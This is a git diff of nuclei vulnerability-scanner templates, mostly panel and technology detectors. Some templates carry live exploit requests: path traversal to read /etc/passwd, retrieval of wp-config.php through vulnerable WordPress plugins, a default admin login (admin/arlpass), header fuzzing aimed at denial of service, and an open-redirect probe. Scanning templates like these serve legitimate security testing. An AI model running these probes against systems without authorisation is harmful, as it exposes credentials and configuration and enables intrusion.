-0,0 +1,26 @@ +id: apple-app-site-association + +info: + name: Apple app site association for harvesting end points + author: panch0r3d + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/.well-known/apple-app-site-association" + - "{{BaseURL}}/well-known/apple-app-site-association" + - "{{BaseURL}}/apple-app-site-association" + redirects: true + max-redirects: 2 + headers: + User-Agent: "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0" + matchers-condition: and + matchers: + - type: regex + regex: + - '(a|A)(p|P)(p|P)(l|L)(i|I)(n|N)(k|K)(s|S)' + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/apple-app-site-association.yaml b/nuclei-templates/Other/apple-app-site-association.yaml deleted file mode 100644 index 53fd428289..0000000000 --- a/nuclei-templates/Other/apple-app-site-association.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: apple-app-site-association - -info: - name: Apple app site association for harvesting end points - author: panch0r3d - severity: info - tags: misc,apple - -requests: - - method: GET - path: - - "{{BaseURL}}/.well-known/apple-app-site-association" - - "{{BaseURL}}/well-known/apple-app-site-association" - - "{{BaseURL}}/apple-app-site-association" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'applinks' - - 'appID' - - 'paths' - condition: and - - - type: word - part: header - words: - - 'application/json' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/application_level_dos.yaml b/nuclei-templates/Other/application_level_dos.yaml deleted file mode 100644 index c220a03cdf..0000000000 --- a/nuclei-templates/Other/application_level_dos.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: Application-dos - -info: - name: Application_level_dos - author: MR.iambatman - severity: critical - description: application_dos - -requests: - - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 - §header§: ab72a99f16a2ff1249c98ccbd2916fa8 - - - payloads: - header: helpers/payloads/request-headers.txt - - attack: clusterbomb - redirects: true - - matchers: - - type: status - status: - - 500 - - 503 - - 502 - - 504 - diff --git a/nuclei-templates/Other/appspec-yml-disclosure-527.yaml b/nuclei-templates/Other/appspec-yml-disclosure-527.yaml new file mode 100644 index 0000000000..a0229fc7c8 --- /dev/null +++ b/nuclei-templates/Other/appspec-yml-disclosure-527.yaml @@ -0,0 +1,28 @@ +id: appspec-yml-disclosure + +info: + name: Appspec Yml Disclosure + author: dhiyaneshDk + severity: medium + reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json + tags: exposure,config + +requests: + - method: GET + path: + - "{{BaseURL}}/appspec.yml" + - "{{BaseURL}}/appspec.yaml" + + matchers-condition: and + matchers: + - type: word + words: + - "version:" + - "os:" + - "files:" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/appspec-yml-disclosure.yaml b/nuclei-templates/Other/appspec-yml-disclosure.yaml deleted file mode 100644 index 5a8637d8a4..0000000000 --- a/nuclei-templates/Other/appspec-yml-disclosure.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: appspec-yml-disclosure -info: - name: Appspec Yml Disclosure - author: dhiyaneshDk - severity: medium - reference: - - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/appsec-yml-disclosure.json - tags: exposure,config -requests: - - method: GET - path: - - "{{BaseURL}}/appspec.yml" - - "{{BaseURL}}/appspec.yaml" - matchers-condition: and - matchers: - - type: word - words: - - "version:" - - "os:" - - "files:" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/arcgis-rest-api.yaml b/nuclei-templates/Other/arcgis-rest-api-533.yaml similarity index 100% rename from nuclei-templates/Other/arcgis-rest-api.yaml rename to nuclei-templates/Other/arcgis-rest-api-533.yaml diff --git a/nuclei-templates/Other/arl-default-login-537.yaml b/nuclei-templates/Other/arl-default-login-537.yaml deleted file mode 100644 index a7c16e40a9..0000000000 --- a/nuclei-templates/Other/arl-default-login-537.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: arl-default-login - -info: - name: ARL Default Login - author: pikpikcu - severity: high - tags: arl,default-login - -requests: - - raw: - - | - POST /api/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - - {"username":"{{username}}","password":"{{password}}"} - - payloads: - username: - - admin - password: - - arlpass - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - condition: and - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/arl-default-login-540.yaml b/nuclei-templates/Other/arl-default-login-540.yaml new file mode 100644 index 0000000000..50f4ac4d1c --- /dev/null +++ b/nuclei-templates/Other/arl-default-login-540.yaml @@ -0,0 +1,38 @@ +id: arl-default-login +info: + name: ARL Default Admin Login + author: pikpikcu + description: An ARL default admin login was discovered. + severity: high + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: arl,default-login +requests: + - raw: + - | + POST /api/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + + {"username":"{{username}}","password":"{{password}}"} + payloads: + username: + - admin + password: + - arlpass + attack: pitchfork + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/arl-default-password-541.yaml b/nuclei-templates/Other/arl-default-password-541.yaml new file mode 100644 index 0000000000..08f426e7da --- /dev/null +++ b/nuclei-templates/Other/arl-default-password-541.yaml @@ -0,0 +1,29 @@ +id: arl-default-password + +info: + name: ARL Default Password + author: pikpikcu + severity: high + tags: arl,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/api/user/login" + headers: + Content-Type: application/json; charset=UTF-8 + body: | + {"username":"admin","password":"arlpass"} + + matchers-condition: and + matchers: + + - type: word + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/arl-default-password.yaml b/nuclei-templates/Other/arl-default-password.yaml deleted file mode 100644 index d1be4b04a1..0000000000 --- a/nuclei-templates/Other/arl-default-password.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: arl-default-password -info: - name: ARL Default Password - author: pikpikcu - severity: high - tags: arl,default-login -requests: - - method: POST - path: - - "{{BaseURL}}/api/user/login" - headers: - Content-Type: application/json; charset=UTF-8 - body: | - {"username":"admin","password":"arlpass"} - matchers-condition: and - matchers: - - type: word - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/artica-web-proxy-detect-545.yaml b/nuclei-templates/Other/artica-web-proxy-detect-545.yaml new file mode 100644 index 0000000000..82b19cfb2d --- /dev/null +++ b/nuclei-templates/Other/artica-web-proxy-detect-545.yaml @@ -0,0 +1,18 @@ +id: artica-web-proxy-detect +info: + name: Artica Web Proxy Detect + author: dwisiswant0 + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/fw.login.php" + matchers-condition: and + matchers: + - type: word + words: + - "Welcome to the Artica Web Administration Interface" + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/artica-web-proxy-detect.yaml b/nuclei-templates/Other/artica-web-proxy-detect.yaml deleted file mode 100644 index 082d88e73c..0000000000 --- a/nuclei-templates/Other/artica-web-proxy-detect.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: artica-web-proxy-detect - -info: - name: Artica Web Proxy Detect - author: dwisiswant0 - severity: info - tags: tech,artica,proxy - -requests: - - method: GET - path: - - "{{BaseURL}}/fw.login.php" - - matchers-condition: and - matchers: - - type: word - words: - - "Welcome to the Artica Web Administration Interface" - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/asanhamayesh-lfi-552.yaml b/nuclei-templates/Other/asanhamayesh-lfi-552.yaml deleted file mode 100644 index d973f0459c..0000000000 --- a/nuclei-templates/Other/asanhamayesh-lfi-552.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: asanhamayesh-lfi -info: - name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability - author: 0x_Akoko - severity: high - reference: - - https://cxsecurity.com/issue/WLB-2018030006 - - https://asanhamayesh.com - tags: asanhamayesh,lfi,traversal -requests: - - method: GET - path: - - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/asanhamayesh-lfi.yaml b/nuclei-templates/Other/asanhamayesh-lfi.yaml new file mode 100644 index 0000000000..6580f1844f --- /dev/null +++ b/nuclei-templates/Other/asanhamayesh-lfi.yaml @@ -0,0 +1,28 @@ +id: asanhamayesh-lfi +info: + name: Asanhamayesh CMS 3.4.6 - Local File Inclusion + author: 0x_Akoko + severity: high + description: Asanhamayesh CMS 3.4.6 is vulnerable to local file inclusion. + reference: + - https://cxsecurity.com/issue/WLB-2018030006 + - https://asanhamayesh.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: asanhamayesh,lfi,traversal +requests: + - method: GET + path: + - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/Other/aspnuke-openredirect-554.yaml b/nuclei-templates/Other/aspnuke-openredirect-554.yaml deleted file mode 100644 index ca498927f1..0000000000 --- a/nuclei-templates/Other/aspnuke-openredirect-554.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aspnuke-openredirect - -info: - name: ASP-Nuke Open Redirect - author: pdteam - severity: low - tags: aspnuke,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" - matchers: - - type: regex - part: body - regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' \ No newline at end of file diff --git a/nuclei-templates/Other/aspnuke-openredirect.yaml b/nuclei-templates/Other/aspnuke-openredirect.yaml new file mode 100644 index 0000000000..1dcc28d81d --- /dev/null +++ b/nuclei-templates/Other/aspnuke-openredirect.yaml @@ -0,0 +1,18 @@ +id: aspnuke-openredirect + +info: + name: ASP-Nuke Open Redirect + author: pdteam + severity: low + tags: aspnuke,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$' \ No newline at end of file diff --git a/nuclei-templates/Other/aspose-ie-file-download-562.yaml b/nuclei-templates/Other/aspose-ie-file-download-562.yaml new file mode 100644 index 0000000000..095211f5e4 --- /dev/null +++ b/nuclei-templates/Other/aspose-ie-file-download-562.yaml @@ -0,0 +1,29 @@ +id: aspose-ie-file-download + +info: + name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download + author: 0x_Akoko + severity: high + description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://packetstormsecurity.com/files/131162/ + - https://wordpress.org/plugins/aspose-importer-exporter + tags: wordpress,wp-plugin,lfi,aspose + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download-565.yaml b/nuclei-templates/Other/aspose-ie-file-download-565.yaml deleted file mode 100644 index 6f7eefcba3..0000000000 --- a/nuclei-templates/Other/aspose-ie-file-download-565.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: aspose-ie-file-download -info: - name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion. - reference: - - https://packetstormsecurity.com/files/131162/ - - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi,aspose -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aspose-pdf-file-download.yaml b/nuclei-templates/Other/aspose-pdf-file-download.yaml index be67326fe2..b6062673c9 100644 --- a/nuclei-templates/Other/aspose-pdf-file-download.yaml +++ b/nuclei-templates/Other/aspose-pdf-file-download.yaml @@ -7,7 +7,7 @@ info: reference: - https://packetstormsecurity.com/files/131161 - https://wordpress.org/plugins/aspose-pdf-exporter - tags: wordpress,wp-plugin,lfi,aspose + tags: wordpress,wp-plugin,lfi requests: - method: GET path: diff --git a/nuclei-templates/Other/aspose-words-file-download-571.yaml b/nuclei-templates/Other/aspose-words-file-download-571.yaml deleted file mode 100644 index d881e787a8..0000000000 --- a/nuclei-templates/Other/aspose-words-file-download-571.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: aspose-words-file-download -info: - name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. - reference: - - https://wpscan.com/vulnerability/7869 - - https://wordpress.org/plugins/aspose-doc-exporter - tags: wordpress,wp-plugin,lfi,aspose -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-words-file-download-574.yaml b/nuclei-templates/Other/aspose-words-file-download-574.yaml new file mode 100644 index 0000000000..a9187a88fa --- /dev/null +++ b/nuclei-templates/Other/aspose-words-file-download-574.yaml @@ -0,0 +1,29 @@ +id: aspose-words-file-download + +info: + name: Aspose Words Exporter < 2.0 - Unauthenticated Arbitrary File Download + author: 0x_Akoko + severity: high + description: The Aspose.Words Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability. + reference: + - https://wpscan.com/vulnerability/7869 + - https://wordpress.org/plugins/aspose-doc-exporter + tags: wordpress,wp-plugin,lfi,aspose + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspx-debug-mode-577.yaml b/nuclei-templates/Other/aspx-debug-mode-577.yaml new file mode 100644 index 0000000000..1879d55864 --- /dev/null +++ b/nuclei-templates/Other/aspx-debug-mode-577.yaml @@ -0,0 +1,33 @@ +id: aspx-debug-mode + +info: + name: ASP.NET Debugging Enabled + author: dhiyaneshDk + severity: info + reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled + tags: debug + +requests: + - raw: + - | + DEBUG /Foobar-debug.aspx HTTP/1.1 + Host: {{Hostname}} + Command: stop-debug + User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: en-US,en;q=0.5 + Content-Length: 2 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - 'OK' + part: body + - type: word + words: + - 'Content-Length: 2' + part: header diff --git a/nuclei-templates/Other/aspx-debug-mode-578.yaml b/nuclei-templates/Other/aspx-debug-mode-578.yaml deleted file mode 100644 index 97a411ee38..0000000000 --- a/nuclei-templates/Other/aspx-debug-mode-578.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: aspx-debug-mode - -info: - name: ASP.NET Debugging Enabled - author: dhiyaneshDk - severity: info - reference: https://portswigger.net/kb/issues/00100800_asp-net-debugging-enabled - tags: debug - -requests: - - raw: - - | - DEBUG /Foobar-debug.aspx HTTP/1.1 - Host: {{Hostname}} - Command: stop-debug - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Length: 2 - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'OK' - part: body - - type: word - words: - - 'Content-Length: 2' - part: header diff --git a/nuclei-templates/Other/atlassian-crowd-panel-581.yaml b/nuclei-templates/Other/atlassian-crowd-panel-581.yaml deleted file mode 100644 index b14248a9a9..0000000000 --- a/nuclei-templates/Other/atlassian-crowd-panel-581.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: atlassian-crowd-panel - -info: - name: Atlassian Crowd Login Panel - author: organiccrap - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ - severity: info - tags: panel,atlassian - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/crowd/console/login.action' - - matchers: - - type: word - words: - - Atlassian Crowd - Login - part: body - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/atlassian-crowd-panel-584.yaml b/nuclei-templates/Other/atlassian-crowd-panel-584.yaml new file mode 100644 index 0000000000..3532e9a84c --- /dev/null +++ b/nuclei-templates/Other/atlassian-crowd-panel-584.yaml @@ -0,0 +1,25 @@ +id: atlassian-crowd-panel + +info: + name: Atlassian Crowd Login Panel + author: organiccrap + severity: info + description: An Atlassian Crowd login panel was discovered. + reference: + - https://www.atlassian.com/ + classification: + cwe-id: CWE-200 + tags: panel,atlassian + +requests: + - method: GET + path: + - '{{BaseURL}}/crowd/console/login.action' + + matchers: + - type: word + words: + - Atlassian Crowd - Login + part: body + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/attitude-theme-open-redirect-588.yaml b/nuclei-templates/Other/attitude-theme-open-redirect.yaml similarity index 100% rename from nuclei-templates/Other/attitude-theme-open-redirect-588.yaml rename to nuclei-templates/Other/attitude-theme-open-redirect.yaml diff --git a/nuclei-templates/Other/atvise-login-590.yaml b/nuclei-templates/Other/atvise-login-590.yaml index b453a6c9c7..ebc1df47af 100644 --- a/nuclei-templates/Other/atvise-login-590.yaml +++ b/nuclei-templates/Other/atvise-login-590.yaml @@ -1,21 +1,18 @@ id: atvise-login info: - name: Atvise Login Panel + name: Atvise Login panel author: idealphase severity: info - description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. + description: atvise is leading visualization and control center solutions based on pure web technology reference: - https://www.exploit-db.com/ghdb/7837 - https://www.atvise.com/en - classification: - cwe-id: CWE-200 metadata: - google-query: intitle:"atvise - next generation" - max-request: 1 - tags: panel,atvise,edb + google-dork: intitle:"atvise - next generation" + tags: panel,atvise -http: +requests: - method: GET path: - '{{BaseURL}}' @@ -30,4 +27,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100837afb5096ac00840c45e91bc6c0c0b0932838628a6c226918c82da88cc05bb6022100d5ff3f90a83e3bfd685f78ed6e209c59cb907fa3367678813fb504cea7a4a33f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/autobahn-python-detect-593.yaml b/nuclei-templates/Other/autobahn-python-detect-593.yaml new file mode 100644 index 0000000000..3a6054cc5a --- /dev/null +++ b/nuclei-templates/Other/autobahn-python-detect-593.yaml @@ -0,0 +1,29 @@ +id: autobahn-python-detect + +info: + name: Autobahn-Python Webserver Detect + author: pussycat0x + severity: info + reference: https://www.shodan.io/search?query=%22AutobahnPython%22 + tags: tech,webserver + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: regex + regex: + - '

    AutobahnPython([ 0-9.]+)<\/h1>' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'AutobahnPython([ 0-9.]+)' diff --git a/nuclei-templates/Other/autobahn-python-detect.yaml b/nuclei-templates/Other/autobahn-python-detect.yaml deleted file mode 100644 index 7a9bc0b55d..0000000000 --- a/nuclei-templates/Other/autobahn-python-detect.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: autobahn-python-detect - -info: - name: Autobahn-Python Webserver Detect - author: pussycat0x - severity: info - metadata: - shodan-query: "AutobahnPython" - tags: tech,webserver - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: regex - regex: - - '

    AutobahnPython([ 0-9.]+)<\/h1>' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - regex: - - 'AutobahnPython([ 0-9.]+)' diff --git a/nuclei-templates/Other/avantfax-panel-601.yaml b/nuclei-templates/Other/avantfax-panel-601.yaml new file mode 100644 index 0000000000..7694287813 --- /dev/null +++ b/nuclei-templates/Other/avantfax-panel-601.yaml @@ -0,0 +1,41 @@ +id: avantfax-panel + +info: + name: AvantFAX Login Panel + author: pikpikcu,daffainfo + severity: info + description: An AvantFAX login panel was discovered. + reference: + - http://www.avantfax.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"AvantFAX - Login" + tags: panel,avantfax,login + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "- AvantFAX - Login" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '

    ([0-9.]+)<\/p>' + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/avantfax-panel-603.yaml b/nuclei-templates/Other/avantfax-panel-603.yaml deleted file mode 100644 index 68b10166f2..0000000000 --- a/nuclei-templates/Other/avantfax-panel-603.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: avantfax-panel - -info: - name: AvantFAX Login Panel - author: pikpikcu,daffainfo - severity: info - metadata: - shodan-query: http.title:"AvantFAX - Login" - tags: panel,avantfax,login - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "- AvantFAX - Login" - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '

    ([0-9.]+)<\/p>' diff --git a/nuclei-templates/Other/avatier-password-management-605.yaml b/nuclei-templates/Other/avatier-password-management-605.yaml new file mode 100644 index 0000000000..f6295f4159 --- /dev/null +++ b/nuclei-templates/Other/avatier-password-management-605.yaml @@ -0,0 +1,20 @@ +--- +id: avatier-password-management + +info: + name: Avatier Password Management Self Service Portal + author: praetorian-thendrickson + severity: info + tags: panel,avatier + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/' + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Management Client' + - '"LabelWelcomeToPS"' \ No newline at end of file diff --git a/nuclei-templates/Other/avatier-password-management.yaml b/nuclei-templates/Other/avatier-password-management.yaml deleted file mode 100644 index 62d6395e8a..0000000000 --- a/nuclei-templates/Other/avatier-password-management.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: avatier-password-management - -info: - name: Avatier Password Management Panel Detect - author: praetorian-thendrickson - severity: info - description: An Avatier password management panel was detected. - reference: - - https://www.avatier.com - metadata: - shodan-query: http.favicon.hash:983734701 - tags: panel,avatier - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/' - - matchers-condition: and - matchers: - - type: word - words: - - 'LabelWelcomeToPS' - - 'Avatier Corporation' - condition: and - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/aviatrix-panel-609.yaml b/nuclei-templates/Other/aviatrix-panel-609.yaml deleted file mode 100644 index e8c89b1cca..0000000000 --- a/nuclei-templates/Other/aviatrix-panel-609.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: aviatrix-panel - -info: - name: Aviatrix Panel Login - author: pikpikcu,philippedelteil,daffainfo - severity: info - metadata: - shodan-query: http.title:"Aviatrix Cloud Controller" - tags: panel,aviatrix - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/assets/img/favicon-32x32.png" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - name: "title" - condition: and - dsl: - - 'contains(body, "Aviatrix")' - - 'contains(body, "Controller")' - - 'status_code == 200' - - - type: dsl - name: "favicon" - dsl: - - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" diff --git a/nuclei-templates/Other/aviatrix-panel-610.yaml b/nuclei-templates/Other/aviatrix-panel-610.yaml new file mode 100644 index 0000000000..9107535ba9 --- /dev/null +++ b/nuclei-templates/Other/aviatrix-panel-610.yaml @@ -0,0 +1,38 @@ +id: aviatrix-panel + +info: + name: Aviatrix Cloud Controller Panel Login + author: pikpikcu,philippedelteil,daffainfo + severity: info + description: An Aviatrix Cloud Controller login panel was detected. + reference: + - https://docs.aviatrix.com/HowTos/controller_config.html + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Aviatrix Cloud Controller" + tags: panel,aviatrix + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/assets/img/favicon-32x32.png" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + name: "title" + condition: and + dsl: + - 'contains(body, "Aviatrix")' + - 'contains(body, "Controller")' + - 'status_code == 200' + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" + +# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/Other/AVideo-user-leakge.yaml b/nuclei-templates/Other/avideo-user-leakge.yaml similarity index 100% rename from nuclei-templates/Other/AVideo-user-leakge.yaml rename to nuclei-templates/Other/avideo-user-leakge.yaml diff --git a/nuclei-templates/Other/avtech-avn801-camera-panel.yaml b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml index 6c233d50a7..8bbb7ce6c5 100644 --- a/nuclei-templates/Other/avtech-avn801-camera-panel.yaml +++ b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml @@ -5,8 +5,7 @@ info: author: idealphase severity: info description: AVTECH offers a range of IP camera series with different shapes, resolutions and lens to fulfill different demands. Select the items needed to narrow down product search. - reference: - - http://www.avtech.com.tw + reference: http://www.avtech.com.tw metadata: shodan-query: title:"login" product:"Avtech AVN801 network camera" tags: panel,avtech,iot,camera diff --git a/nuclei-templates/Other/avtech-dvr-exposure.yaml b/nuclei-templates/Other/avtech-dvr-exposure-614.yaml similarity index 100% rename from nuclei-templates/Other/avtech-dvr-exposure.yaml rename to nuclei-templates/Other/avtech-dvr-exposure-614.yaml diff --git a/nuclei-templates/Other/aws-access-key-value-625.yaml b/nuclei-templates/Other/aws-access-key-value-624.yaml similarity index 100% rename from nuclei-templates/Other/aws-access-key-value-625.yaml rename to nuclei-templates/Other/aws-access-key-value-624.yaml diff --git a/nuclei-templates/Other/aws-bucket-takeover-631.yaml b/nuclei-templates/Other/aws-bucket-takeover-631.yaml deleted file mode 100644 index e0d78b9f0e..0000000000 --- a/nuclei-templates/Other/aws-bucket-takeover-631.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: aws-bucket-takeover -info: - name: AWS Bucket Takeover Detection - author: pdcommunity - severity: high - tags: takeover,aws - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - "The specified bucket does not exist" - - type: dsl - dsl: - - contains(tolower(all_headers), 'x-guploader-uploadid') - negative: true diff --git a/nuclei-templates/Other/aws-bucket-takeover-632.yaml b/nuclei-templates/Other/aws-bucket-takeover-632.yaml new file mode 100644 index 0000000000..1f65120b42 --- /dev/null +++ b/nuclei-templates/Other/aws-bucket-takeover-632.yaml @@ -0,0 +1,20 @@ +id: aws-bucket-takeover +info: + name: AWS Bucket Takeover Detection + author: pdteam + severity: high + tags: takeover,aws,bucket + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "The specified bucket does not exist" + - type: dsl + dsl: + - contains(tolower(all_headers), 'x-guploader-uploadid') + negative: true diff --git a/nuclei-templates/Other/aws-cloudfront-service-635.yaml b/nuclei-templates/Other/aws-cloudfront-service-635.yaml new file mode 100644 index 0000000000..b247e81533 --- /dev/null +++ b/nuclei-templates/Other/aws-cloudfront-service-635.yaml @@ -0,0 +1,22 @@ +id: aws-cloudfront-service + +info: + name: AWS Cloudfront service detection + author: jiheon-dev + severity: info + tags: aws,tech,service + description: Detect websites using AWS cloudfront service + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + condition: or + dsl: + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 